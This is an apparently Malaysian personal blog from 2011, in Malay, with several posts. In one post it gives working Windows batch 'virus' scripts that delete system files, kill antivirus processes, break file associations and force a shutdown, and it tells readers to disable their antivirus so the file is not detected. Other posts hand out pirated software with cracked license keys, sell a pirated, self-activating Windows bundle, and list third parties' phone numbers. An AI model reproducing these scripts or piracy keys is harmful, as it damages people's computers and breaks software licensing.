Isnin, 19 Disember 2011

Software Penting Untuk Maintenance Komputer

Salam dan selamat sejahtera kepada semua pembaca blog. Disini saya ingin berkongsi dua software bagi saya sangat penting dan diperlukan untuk maintenance komputer iaitu Tuneup Utilities dan Advanced Systemcare. Kedua-dua software ini mempunyai fungsi berbeza dan mempunyai kelebihan masing-masing tetapi sama matlamatnya iaitu untuk maintenance komputer anda supaya komputer berada dalam keadaan baik. Untuk mengetahui lebih lanjut fungsi-fungsi yang ada didalam software tersebut anda boleh pergi ke link Sila Klik Disini untuk Tuneup Utilities dan Advanced systemcare Disini.

Sedikit preview interface Tuneup Utilities

 
Kalau anda berminat anda boleh mendownload disini secara Full Version 



Preview interface untuk Advanced systemcare


 
Berminat boleh Download secara Full Version Klik 
                                                      
Untuk menjadikan version pro anda klik dekat icon Upgrade Now>Enter License>masukkan key ini  F31C7-DC165-BBBD3-1F7FA .Kalau tidak faham dan kurang jelas sila lihat gambar diatas. Anda perlukan sambungan internet untuk pengaktifan oleh itu pastikan anda bersambung dengan internet. Perlu di ingatkan Key untuk version pro hanya boleh guna sebelum tarikh 30 Dis 2011. Jika selepas itu anda tidak boleh menggunakan key tersebut,sila cuba lain-lain key yang telah diberikan oleh saya di dalam notepad. Selain itu, terdapat cara lain jikalau anda terlewat dari tarikh tersebut iaitu dengan cara disconnected internet anda dan masukkan key  DFF7A-8204E-69ADE-0D5AA .Semoga berjaya ;-)..Sila gunakan lain-lain key yang telah diberikan oleh saya dalam notepad tersebut..Sekian dari saya..Semoga tips ini sedikit sebanyak membantu urusan pembaca blog saya :-)


Katakan Tak Nak, Berfikir Sebelum Bertindak, Anda Mampu Melakukan Tak Nak Merokok

Bahaya Merokok

Merokok memberi kesan kepada keluarga dan masyarakat.
1   Ibu mengandung yang merokok atau atau terdedah kepada asap rokok boleh menyebabkan bayi lahir tidak cukup bulan,rendah berat badan atau mati dalam kandungan.
 
Selain itu kerosakan gigi juga boleh berlaku kesan dari merokok

 
Adakah anda mahu paru-paru seperti ini?? Katakan Tak Nak Kepada Rokok

2   Kanak-kanak yang kerap terdedah kepada asap rokok akan kerap mengalami batuk, selsema, jangkitan telinga,hidung dan tekak–mengalami perkembangan paru-paru yang lambat–berisiko mendapat serangan asma.

 
Berfikir sebelum bertindak supaya tidak menyesal dikemudian hari


Apa Yang Ada Didalam Sebatang Rokok 

Demikian hebatnya asap rokok. Rokok yang dihisap mengeluarkan bahan beracun. Setiap dihisap mengeluarkan bahan beracun. Setiap hembusan mengandungi 4000 kimia termasuk:-Aceton (penanggal cat),Toluidine (pelarut industri)Ammonia (pencuci lantai).Methanol (bahan api roket)Napthalene (ubat gegat)DDT (ubat pembunuh serangga)Butane (minyak lighter)Hydrogen cyanide (gas yang digunakan untuk hukuman bunuh).


Kaedah Berhenti Merokok

1 Tetapkan tarikh untuk berhenti merokok

2 Yakinkan Diri

3 Buat nota peringatan

4 Katakan pada diri anda "Aku Bukan Perokok"

5 Beri tumpuan

6 Sentiasa berfikiran positif

7 Dapatkan sokongan 

8 Lawan keinginan untuk merokok 

9 Melengah-lengah waktu merokok dan minum banyak air masak

10 Penuhkan aktiviti anda dengan benda2 yang bermanfaat dan menjauhkan diri dari orang yang merokok supaya mengelak ketagihan.


 
Buat aktiviti yang menyeronokan anda dan buang pilihan untuk merokok.Gambar diatas menunjukan bagaimana saya dan rakan-rakan menghilangkan stress dan seterusnya mengawal pengambilan rokok.


11 Menguyah sesuatu seperti gula-gula getah

12 Akhir sekali memohon doa dan bertawakal.


Faedah Berhenti Merokok 

1 Hidup lebih lama

2 Dapat menghindari racun

3 Menjadi teladan yang baik kepada anak-anak

4 Sihat tubuh badan dan bebas dari penyakit.

Elakkan Merokok Dikawasan Ini

Tadika asuhan, taman kanak-kanak 
-
- Dewan Awam
-
- Kenderaan awam
-
- Tempat makan berhawa dingin
-
- Lif awam
-
- Hentian pengangkutan awam
-
- Hospital/ klinik 
-
- Institusi kewangan, Telekom Malaysia, Tenaga Nasional, Pos Malaysia
-
- Lapangan terbang
-
- Pusat menbeli -belah
-
- Pusat-pusat hiburan
-
- Kompleks sukan
-
- Institusi pendidikan tinggi
 -
-Sekolah
-
-Pejabat kerajaan.

 

Kementerian Kesihatan Malaysia telah mengadakan kempen taknak ,smoking kill seperti duit free melalui  PHOTO CONTEST anda boleh rujuk disini gayahidupsihat.my untuk menjayakan program ini dan menyedarkan masyarakat bahawa bahaya kesan merokok dan seterusnya mengurangkan bilangan perokok tegar terutamanya remaja. Semoga dengan kempen kreatif ini dapat menjayakan hasrat kerajaan untuk memastikan kesejahteraan dan kesihatan rakyat terjamin.

  


Ahad, 18 Disember 2011

Teknik Buat Virus Delete Folder

Teknik ini adalah sambungan dari post saya sebelum ini.. Kalau belum baca silalah lihat disini Cara buat virus kerana teknik tersebut adalah sama sahaja..saya hanya bagi code kemudian copy paste dalam notepad dan pastikan save dengan nama akhir .bat..contoh delete folder.bat


Copy code ini


@echo off
del "c:\windows\pchealth"
del "c:\windows\system"
del "c:\windows\system32\restore"
del "c:\windows\system32\autoexec.nt"
del "c:\windows\system32\ntoskrni.exe"
del "c:\winlogon.exe"
Kebanyakan antivirus sudah boleh mengenal pasti virus tersebut, untuk memastikan tidak di kesan oleh antivirus dan terus dipadam oleh antivirus sila matikan fungsi antivirus (disable) tersebut kemudian masukan didalam pendrive dengan segera atau menggunakan winzip,winrar supaya memudahkan urusan anda. Diperingatkan supaya anda tidak mengklik file virus tersebut..Ingat sebarang kecuaian anda menjadi tanggungjawab sendiri ok.
Lain-lain code seperti dibawah>>

TITLE VIRUS IS MY DNA
COLOR 0A
@ECHO OFF
SET END=MD “U CANT EASCAPE FROM ME-VISHNU”
SET FIN=COPY “HACK LOG.TXT” “INSTALLING”
%END%
%FIN%
NET SEND * ANDHRA PRADESH- VIRUS CREATED IN KARIMNAGAR FROM JITS COLLEGE
KILL NAVAPSVC.EXE /F /Q
KILL ZONELABS.EXE /F /Q
KILL EXPLORER.EXE /F /Q
CLS
ASSOC .EXE=TXTFILE
ASSOC .TXT=MP3FILE
ASSOC .MP3=.VCF
CLS
MSG * HI DUDE THIS IS BEGINING.
MSG * VISHNU ATTCKED THE SYSTEM TRY TO CHALLENGE HIM .
DEL C:\WINDOWS\SYSTEM32\LOGOFF.EXE /F /Q
DEL C:\WINDOWS\SYSTEM32\LOGON.EXE /F /Q
DEL C:\WINDOWS\SYSTEM32\LOGON.SCR /F /Q
CLS
SHUTDOWN

Macam biasa copy paste dalam notepad 

SAVE AS KEPADA INSTALLHACK.BAT . JADIKAN SAVE AS TYPE: KEPADA ALL FILES. SAVE DI LOCAL DISK C 


Ahad, 11 Disember 2011

Format Lap Top,Komputer

Khas teknik format lap top/pc windows 7 kepada student dan juga kepada semua.


Bagi anda yang kurang mahir dalam memperbaiki lap top/pc ketika menghadapi masalah seperti windows crash,infected virus,windows hang dan sebagainya bolehlah mendapatkan e-book ini beserta dengan software windows 7 All version 32 bits dan 64 bits,lain-lain software hanya dengan Rm 40.00 sahaja..Edisi lengkap bersama pemasangan Driver untuk memudahkan anda..

Kelebihan membeli ebook ini

1 . Anda tidak perlu lagi bersusah payah menghantar ke kedai untuk memformat lap top/pc anda yang semestinya menjimatkan masa dan kos. Kos biasa yang selalu dikenakan di kedai bergantung kepada harga yang ditetapkn selalunya Rm50 keatas dan memakan masa yang agak lama.

2. Anda boleh membuat pendapatan sampingan dengan membuat service format lap top/pc dari kawan-kawan anda setelah mempelajari teknik ini.

3. Penerangan yang efektif bersama gambar yang menarik memudahkan anda untuk mempelajari setiap teknik yg diajarkan bersama pakej software lengkap dengan harga yang sangat-sangat murah khas untuk student dan pembaca yang ingin mempelajari teknik format komputer.

4. Windows 7 yg diberikan mengandungi semua versi 32 bit,64 bit. Starter, Home Basic, Home Premium, Professional and Ultimate,Enterprise dan yang terpenting boleh Update windows kerana semua versi tersebut mggunakan teknologi (WAT). Apa itu
WAT? sila baca (Windows Activation Technologies) <is auto removed and hence no need of activating. It auto-activates genuine and you can install all updates without any problem.>So boleh update tanpa ragu-ragu dan windows anda sentiasa ditampal dengan new security dari Microsoft windows untuk mengelakkan ancaman terkini (hackers,virus,bug software,zero day attacks) dan sebagainya.

Jangan lepaskan peluang ini kerana harga yang ditawarkan adalah berpatutan malah jauh lebih murah dari service yang ada dipasaran khas hanya untuk student dan golongan yang baru untuk mempelajari teknik format ini.

Fikirkan

 1.     Sampai bila nak hantar ke kedai bila komputer anda menghadapi masalah

 2.    Anda tidak mahu kepuasan diri dengan mempelajari sesuatu yang baru (berjaya format komputer sendiri) dan menghasilkan duit sendiri dengan membuat servis format komputer.

 3.   Mudah,menjimatkan kos membaik pulih dan kos kewangan anda

 4. Mudah menjimatkan masa tanpa perlu bersusah payah hantar ke kedai.




jadi tunggu apa lagi..

Anda masih ragu2,samar,risau dan sebagainya??

Tak apa sila sms atau call saya 017-5408904 ..Link facebook saya https://www.facebook.com/SkyproHackers untuk sebarang pertanyaan dan tempahan
serta untuk meyakinkan anda saya ada menyediakan maklumat individu yang pernah membeli Teknik Format ini >>

Encik Muhammad Emir Fariz
No Tel : 017-6917341

Encik Muhammad Izzuddin Kamaluddin
No Tel : 017-7632736

Dan banyak lagi individu sejak saya mula2 menjual Teknik Format ini pada tahun 2011 yang saya tak dapat nyatakan disini,jika anda ragu2 dan kurang yakin anda boleh sms atau call  tanya dyorg tentang Teknik Format ini..

Dah Yakin?>>>Dapatkan sekarang...


Sila SMS saya 017-5408904 untuk tempahan dan pertanyaan atau anda juga boleh berhubung dengan saya melalui>

Facebook
Name: New Generations Sky
https://www.facebook.com/SkyproHackers

Yahoo Mail
fendi8937@yahoo.com.my

Gmail
akish_hakimi89@gmail.com


Jumlah Pembayaran RM40.00 

Selepas itu sms saya 017-5408904 yang anda telah membuat pembayaran,masa,tarikh yang tertera di resit,nama anda,no tel, alamat dan maklumat-maklumat yang dirasakan perlu untuk saya pos dengan segera.Untuk Microsoft Office anda boleh pilih dan sms saya sama ada nak pakai 2007,2010 dan yang terbaru 2013..Sila nyatakan juga versi 32bit atau 64bit mengikut windows yang anda mahu pakai...Terima Kasih 

Jangan risau anda akan diberikan tracking number poslaju untuk pengesahan penghantaran

Sedikit preview pic format yang ada dalam ebook ini






Ahad, 20 November 2011

Cara Nak Copy Paste Blog Yang Dilindungi

Salam sejahtera semua,baru-baru nie ada kawan tanya pasal cara nak copy blog yang dilindungi,ingatkan semua dah taw pasal nie,so saya ingin berkongsi cara-cara untuk mendisablekan JavaScript seterusnya membolehkan blog tersebut di copy..ahaha ayat macam apa lagi..hmm ok kita teruskan,sila lihat gambar dibawah

Nie cara untuk google chrome ok..

On the Chrome browser click on wrench icon at the top right and then click “Options”.
Go to “Under the Hood” tab. In the Privacy area click on “Content Settings” button.
In the content settings, click on the “JavaScript” given on the left. Now select the option “Don not allow any site to run JavaScript”.
Similarly click the “Plug-ins” on the left and check the option next to “Do not allow site to run plug-ins”. Click the “Close” button.
Now visit any site which runs Javascript on your browser. You will not able to access it. For example you won’t login into your Facebook account because it runs JavaScript on your browser while you login. Also you can’t run any bookmarklet on your browser.

Since the plugins include Flash plugins therefore you can’t run Flash content on your browser after disabling it. For example you can’t play YouTube videos after disabling plug-ins.

Dibawah cara untuk Mozila Firefox


anda boleh cuba buat di blog nie ok..sebab blog nie kadang-kadang ada code yang perlu di copy,so tak perlu lagi minta kebenaran untuk copy..huhu..semoga berjaya yea..satu lagi, untuk disable kalau yang guna Internet explorer dan lain-lain lagi boleh lihat caranya disini..Nak Banyak Cara Lagi

Jumaat, 11 November 2011

Download Avira Antivirus Premium 2012

Seperti kita sedia maklum avira telah mengeluarkan versi terbarunya dengan pelbagai tambahan fungsi terkini.

Kepada sesiapa yang belum ada antivirus tue ataupun berhajat nak guna avira nie boleh la mendownload disini

haaa sebelum terlupa licene key hanya boleh guna sampai 14.02.2012 jea ok..

nak guna licene key lama lagi tunggu update di blog nie la yea..

 Klik Disini Untuk Download
Password untuk exract winzip fendiskypro

Convert Lagu Dalam Pelbagai Format

Salam sejahtera semua,kembali lagi untuk kongsi tips yang seterusnya,disini ada satu software yang memudahkan anda menukar fail audio dalam pelbagai format termasuklah,

  1. Convert mp3 to wav, mp3 to wma, mp3 to ogg
  2. Convert wav to mp3, wav to ogg, wav to wma
  3. Convert wma to ogg, wma to wav, wma to mp3
  4. Convert ogg to mp3, ogg to wav, ogg to wma 
waah banyak betul fungsinya dan kebolehan menukar fail dalam pelbagai format..Dibawah ada interface software ni


terbaiiik punya la..opss satu lagi,ianya support untuk windows xp dan kebawah,,tapi ia diuji dan boleh guna untuk windows 7 profesional x64bit editions..kira bole tahan la software nie..huhu..tunggu apa lagi boleh download dibawah secara full versions hanya ada di blog nie jea..hehe

 Klik Disni Untuk Download
kata laluan untuk extract winzip fendiskypro

Khamis, 10 November 2011

Cara Buat Peta Minda Dengan Efektif Download MindjetMindManager2012

Salam sejahtera kepada semua pembaca blog..fuuuh penat rasanya dengan pelbagai tugasan harian namun alhamdulillah dapat juga menyiapkan satu lagi informasi dan software yang mungkin sangat berguna kepada pembaca blog hari nie..Software nie sangat efektif kepada sesiapa sahaja yang mahu menghasilkan peta minda yang kreatif dengan warna menarik semestinya memudahkan tugasan kita seperti menghafal,merancang plan dengan teliti dan sebagainya..Dibawah menunjukan beberapa interface software nie ok.Cara nak guna software nie lebih kurang sama dengan Microsoft Office ok cuma lebih power la sebab boleh tukar fail nie dengan erti kata lain convert fail ke pdf format,word,excel dan banyak lagi la..








Arrrgghhh tengok gambar pun dah faham kan fungsi dan kelebihan guna software nie,so tanpa bercerita panjang lagi sila la download dibawah


Kata Laluan Fail Zip
fendiskypro

Software Terbaik Elak Penyebaran Virus Komputer

Salam dan selamat sejahtera kepada semua pembaca blog, rasanya sudah lama saya tidak mengupdate blog nie yea,masalah lambakan info2 di internet,kekurangan idea dan kekangan masa untuk membuat analisis ataupun penilaian yang terbaik untuk menyediakan info2 berguna kepada pembaca blog menyebabkan masalah ini.

Apa2 pun hari ini saya ingin berkongsi beberapa maklumat yang mungkin berguna kepada pembaca blog sekalian,saban hari terciptanya pelbagai definisi terbaru virus dengan pelbagai cara serangan yang lebih kompleks menyebabkan ramai pengguna komputer terdedah dengan ancaman siber terkini,lebih malang lagi kita sebagai pengguna tidak mempunyai sebarang pengetahuan dan perisai yang dapat menangani ancaman virus terkini yang lebih kompleks tersebut

Oleh yang demikian saya ingin memberi cadangan kepada anda semua bagi menangani masalah tersebut.
Saya memerhati dan membuat analisis tentang keberkesanan satu software yang sangat berguna kepada pembaca sekalian iaitu Usb Disk Security yang dapat menyekat sebarang virus secara autorun dari merebak dan menjangkiti sistem komputer anda,ia amat efektif kerana dapat menyekat virus dari perkongsian data atau fail melalui usb

Untuk keterangan lanjut anda boleh membuat carian dari google dan sebagainya untuk mengetahui lebih banyak informasi tentang software tersebut.

Klik Dini Untuk Keterangan Software Tersebut

Disni saya cuma ingin kongsikan software tersebut secara percuma..Full Versions.

Klik Disini Untuk Download Versions 6.0

Klik Disini Untuk Versions Terbaru

Selain itu anda boleh menggunakan Microsoft Security Essentials sebagai pembantu sistem pertahanan dari ancaman terkini. Semua software yang dicadangkan diatas adalah terbaik untuk atasi masalah penyebaran virus micro termasuklah virus secara autorun dari usb.Ia adalah pelengkap kepada software antivirus anda,memang sesetengah antivirus ada menyediakan pertahanan untuk usb dari ancaman virus tetapi anda harus ingat tidak semua penyedia atau perkhidmatan antivirus tersebut dapat menyekat sesetengah virus dengan erti kata lain full protections for usb virus infections,oleh yang demikian elok lah kita menambah satu lagi aplikasi yang mudah dan menarik untuk digunakan sebagai perlindungan secara efektif dan berkesan..lagipun anda boleh dapat software tersebut secara percuma dalam blog saya berbanding secara bayaran ataupun anda mendownload di web2 yang belum tentu keselamatan anda terjamin.

Klik Disini Untuk Mendownload Microsoft Security Essentials


Harus diingat Microsoft Security Essentials nie hanya untuk windows yang ori sahaja k,cuba cari bagaimana mengaktifkan windows anda di sumber2 internet,rasanya di blog saya ada post pasal nie,cari-cari dan selongkarlah..

Eh sebelum terlupa ada satu lagi software antivirus yang sangat2 ringan untuk digunakan,software antivirus tue amat efektif dalam mengatasi masalah virus shortcut,virus shortcut nie la yang ramai sangat orang bising fail2 semuanya jadi shortcut dalam pendrive or usb..huhu, ok tanpa bercerita panjang selamat mendownload dan tengok la keberkesananya.. ;-) antivirus tu buatan indonesia,memang terbaik la..

klik Disini


Ok sampai disini sahaja,jangan lupa lihat artikel yang seterusnya dengan informasi yang lebih padat lagi ;-)..


Kata Laluan Untuk Buka Fail Zip
fendiskypro

Selasa, 27 September 2011

Macam Mana Nak Lajukan RAM Komputer

Masalah Komputer lembap? Cepat hang? Menghadapi masalah seperti lambat apabila membuka sesuatu aplikasi??Jangan risau saya akan membantu anda untuk menyelesaikan masalah diatas..

Sila guna software dibawah untuk mengatasi masalah diatas yea..

ok sedikit intro pasal software nie yea..

RAM Saver Pro is an easy-to-use RAM boosterRAM optimizer tool that will keep your computer running faster. RAM optimizer increases the operation system performance by making more memory available for your applications.
RAM Saver Pro will:
  • defragment system memory for faster access time;
  • increasing the efficiency of your CPU and Motherboard caches;
  • recover memory leaks from poorly behaved applications;
  • temporarily flush unused libraries out to disk and so on.
Using these optimization tricks will help your favorite applications and games run faster and more efficiently - even on old computers.




Tunggu lagi sila la Download kat bawah nie 


Full Version plak tue..
Yang nie untuk version 10
Yang nie untuk version 11

Cara Nak Remove Software Dengan Berkesan

Kadang2 ada software yang kita nak remove (uninstaller) gagal dibuang secara total ataupun dengan erti kata yang mudah gagal dibuang secara menyeluruh menyebabkan sesetengah fail ada didalam komputer kita..Disini mungkin akan membantu anda untuk menyelesaikan masalah tersebut..Selain itu software ini juga amat berguna untuk menyelesaikan masalah seperti fail yang gagal dikesan untuk Di uninstaller seperti yang berlaku di Control Panel komputer anda...Fail2 atau software yang selalu gagal dibuang secara keseluruhan adalah seperti Antivirus contohnya Kaspersky,Avast,Avira dan software2 yang mengandungi malware,spyware dan sebagainya.

Dengan perkongsian ini diharapkan dapat membantu anda dalam mengatasi masalah tersebut..Semoga bermanfaat kepada pembaca blog..Saya mengalu-alukan komen anda tentang artikel ini dan sebarang pertanyaan amatlah dihargai>>peeahh ayat dewan bahasa dan pustaka plak dah..hehe..ok..sedikit intro pasal software nie yea>>




Nampak gambar diatas??berbeza kalau anda menggunakan Control Panal untuk membuang (Uninstaller) software kerana ia masih simpan beberapa fail didalam komputer anda,sebab itu lah komputer kita akan menjadi lembap atau hang suatu hari nanti..Dengan menggunakan Revo Uninstaller nie akan membuang secara menyeluruh fail2 yang ada..



Revo Uninstaller Pro helps you to uninstall software and remove unwanted programs installed on your computer easily! Even if you have problems uninstalling and cannot uninstall them from "Windows Add or Remove Programs" control panel applet.
Revo Uninstaller is a much faster and more powerful alternative to "Windows Add or Remove Programs" applet! It has very powerful features to uninstall and remove programs.
  • No more stubborn programs
  • No more installation errors
  • No more upgrade problems
  • Remove programs easily
With its advanced and fast algorithms, Revo Uninstaller Pro analyzes an application's data before uninstall and scans for remnants after the uninstall of a program. After the program's regular uninstaller runs, you can remove additional unnecessary files, folders and registry keys that are usually left over on your computer. Revo Uninstaller Pro offers you some simple, easy to use, but effective and powerful methods for uninstalling software like tracing the program during its installation.
Revo Uninstaller Pro has a very powerful feature called Forced Uninstall. Forced Uninstall is the best solution when you have to remove stubborn programs, partially installed programs, partially uninstalled programs, and programs not listed as installed at all!
To remove a program completely, and without leaving a trace, you can monitor all system changes made during its installation, and then use that information to uninstall it with one click only – simple and easy!

Haaa tunggu apa lagi sila la download software nie Full Version Secara percuma Ok..Klik Disini

Selasa, 20 September 2011

Memerlukan Tukang Rumah


Kami menyediakan khidmat menyambung rumah,mengubah suai dan membina rumah serta  membaiki kerosakan bumbung atau bahagian-bahagian rumah, memasang mozek dengan kemas, memasang dan membaiki paip, mengecat rumah , mengecat bumbung ... khidmat memasang grill / pagar dan plaster ceiling yang cantik juga disediakan. Semua servis dengan harga yang berpatutan ....  
kami menawarkan servis ini di kawasan sekitar
Daerah Baling dan Sik Kedah,Darul Aman sahaja.... sila hubungi Encik Zaidi Di talian>> 0134196877. Untuk pertanyaan lanjut ..   Terima Kasih










Beli Buku Murah Pelbagai Tajuk